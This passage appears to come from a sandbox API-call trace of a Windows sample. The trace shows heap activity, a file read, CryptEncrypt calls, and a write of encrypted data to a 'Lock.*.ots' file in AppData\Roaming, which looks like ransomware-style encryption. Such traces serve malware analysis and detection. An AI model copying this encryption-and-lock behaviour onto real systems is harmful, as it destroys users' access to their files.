(in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0149.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0149.957] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0149.957] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.957] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0149.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0149.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0149.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0149.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0149.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0149.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0149.957] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0149.958] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.rCxPhCicoc5u7sEbYlz.ots" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.rcxphcicoc5u7sebylz.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4fc [0149.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7020 [0149.958] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.958] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.958] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0149.958] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0149.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0149.961] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0149.961] ReadFile (in: hFile=0x4ec, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x942f, lpOverlapped=0x0) returned 1 [0149.963] ReadFile (in: hFile=0x4ec, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0149.966] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0149.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0149.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0149.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0149.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x942f) returned 0x2a9a140 [0149.966] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0149.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0149.967] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0149.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0149.967] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0149.968] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0149.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0149.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0149.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0149.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0149.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0149.968] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0149.968] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.968] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0149.968] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0149.968] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.968] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.968] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0149.968] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0149.969] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.969] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.969] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa240 [0149.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0149.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0149.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0149.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aaa348 [0149.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa348, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0149.970] CryptEncrypt (in: hKey=0x9e2278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x942f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x9430) returned 1 [0149.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0149.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0149.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0149.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa240 [0149.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0149.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0149.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0149.970] CharLowerBuffW (in: lpsz="byte[37936]", cchLength=0xb | out: lpsz="byte[37936]") returned 0xb [0149.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69a60 [0149.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0149.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0149.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0149.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0149.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0149.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0149.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0149.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0149.971] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.971] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.971] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0149.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0149.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0149.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0149.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aaa4c8 [0149.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa4c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0149.971] CryptEncrypt (in: hKey=0x9e2278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ac1c80*, pdwDataLen=0x8cef60*=0x942f, dwBufLen=0x9430 | out: pbData=0x2ac1c80*, pdwDataLen=0x8cef60*=0x9430) returned 1 [0149.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0149.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0149.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0149.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0149.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0149.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0149.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0149.973] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0149.973] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0149.973] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0149.973] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0149.973] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.973] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.980] WriteFile (in: hFile=0x4fc, lpBuffer=0x2aaf410*, nNumberOfBytesToWrite=0x9430, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aaf410*, lpNumberOfBytesWritten=0x8cf5e4*=0x9430, lpOverlapped=0x0) returned 1 [0149.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0149.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0149.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0149.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0149.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0149.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0149.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0149.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0149.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0149.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0149.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0149.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.982] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0149.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0149.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0149.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0149.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0149.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0149.982] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0149.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0149.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0149.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0149.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0149.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0149.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0149.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.983] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0149.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0149.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0149.983] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0149.984] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0149.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0149.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa2e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.985] GetProcAddress (hModule=0x76390000, lpProcName="CryptDestroyKey") returned 0x763afa60 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0149.985] CryptDestroyKey (hKey=0x9e2278) returned 1 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 